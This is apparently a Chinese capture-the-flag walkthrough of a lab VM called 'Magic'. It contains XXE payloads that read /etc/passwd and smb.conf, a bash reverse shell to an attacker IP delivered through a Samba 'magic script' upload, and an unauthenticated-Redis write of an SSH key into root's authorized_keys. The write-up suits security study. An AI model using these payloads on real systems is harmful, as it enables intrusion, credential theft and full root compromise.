nmap扫描
┌──(root㉿kali)-[~]
└─# nmap -sS 192.168.31.67
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-20 09:21 EDT
Nmap scan report for Magic (192.168.31.67)
Host is up (0.00091s latency).
Not shown: 996 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 08:00:27:79:46:1E (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 0.34 seconds有smb服务
web是xxe漏洞
因为不知道用户名,所有先读取passwd查看一下有哪些用户
<!DOCTYPE data [
<!ENTITY example SYSTEM "file:///etc/passwd">
]>
<data>&example;</data>
<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY example SYSTEM "file:///home/tuf/user.txt">
]>
<data>&example;</data>
获取shell
现在需要获取shell,但是xxe默认是无法执行命令的。
刚刚扫描的时候扫出来了一个smb服务。使用xxe读取一下配置文件
<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY example SYSTEM "file:///etc/samba/smb.conf">
]>
<data>&example;</data><?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY example SYSTEM "file:///etc/samba/smb.conf">
]>
<data>[global]
workgroup = WORKGROUP
server string = Samba Server
security = user
map to guest = Bad User
[magic_upload]
path = /srv/samba/upload
writable = yes
guest ok = yes
guest only = yes
force create mode = 0777
force directory mode = 0777
magic script = dashazi.sh
</data>magic_upload允许写入,可以匿名访问,且经过测试上传⽂件名为dashazi.sh的时候会直接执⾏
写入反弹shell到dashazi.sh
#!/bin/bash
/bin/sh -i >& /dev/tcp/192.168.31.190/7777 0>&1
拿到shell
提权
nobody@Magic:/srv/samba/upload$ ss -tunl
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port
udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:*
udp UNCONN 0 0 192.168.31.255:137 0.0.0.0:*
udp UNCONN 0 0 192.168.31.67:137 0.0.0.0:*
udp UNCONN 0 0 0.0.0.0:137 0.0.0.0:*
udp UNCONN 0 0 192.168.31.255:138 0.0.0.0:*
udp UNCONN 0 0 192.168.31.67:138 0.0.0.0:*
udp UNCONN 0 0 0.0.0.0:138 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 50 0.0.0.0:445 0.0.0.0:*
tcp LISTEN 0 50 0.0.0.0:139 0.0.0.0:*
tcp LISTEN 0 128 127.0.0.1:6379 0.0.0.0:*
tcp LISTEN 0 128 [::]:22 [::]:*
tcp LISTEN 0 50 [::]:445 [::]:*
tcp LISTEN 0 128 [::1]:6379 [::]:*
tcp LISTEN 0 50 [::]:139 [::]:*
tcp LISTEN 0 128 *:80 *:*可以看到存在一个redis服务
fscan扫描一下
nobody@Magic:/tmp$ ./fscan_gw-cYPJhhxC -h 127.0.0.1
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
127.0.0.1:139 open
127.0.0.1:80 open
127.0.0.1:22 open
127.0.0.1:6379 open
127.0.0.1:445 open
[*] alive ports len is: 5
start vulscan
[*] WebTitle http://127.0.0.1 code:200 len:7534 title:XML Processor
[+] Redis 127.0.0.1:6379 unauthorized file:/root/.ssh/authorized_keys
[+] Redis 127.0.0.1:6379 like can write /root/.ssh/
[+] Redis 127.0.0.1:6379 like can write /var/spool/cron/Redis 存在未授权访问风险,能访问/root/.ssh/authorized_keys 文件.
那么就写公钥
攻击机生成密钥对
ssh-keygen -t rsa -b 2048 -f id_rsa_redis -N ''
(echo -e "\n\n"; cat id_rsa_redis.pub; echo -e "\n\n") > payload.txt登录redis
nobody@Magic:/tmp$ redis-cli -h 127.0.0.1 -p 6379
127.0.0.1:6379>
127.0.0.1:6379>
127.0.0.1:6379> flushall
OK
127.0.0.1:6379> set crackit "\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzH2KD4lTemQ/qH9ClfBLIHtdG3d+JNnBqFBxJWr93L2F3XKFeljZ9YgmV8w068fhUfVZHXkNA4m8BZGJFgl/QbWGJlJVJuFG3ddmrOyw7oo0UzfTUigHaMi8Js0Jp54nC9Pyf330NwNyIPs+knqiypkQNirzuhCGxpydE6yS1sM5v11ZLSteQjUYyweBeEzfLTMW+SwRivFWE3KvUWLycaYvOG1lorgNN7+ndorC0m6/0iTllIbgssmUkj6pQmLx8r4x6PVZ/qY0mDjpvkDXl9NuVavacOX+r6vElXJDjj404c7z7kEqL4OKMeEClvQ/Pg3PZwwrAY+FOvDrLa6iz root@kali\n\n"
OK
127.0.0.1:6379> config set dir /root/.ssh
OK
127.0.0.1:6379> config set dbfilename authorized_keys
OK
127.0.0.1:6379> save
OK
127.0.0.1:6379>
攻击机登录
ssh -i id_rsa_redis root@192.168.31.67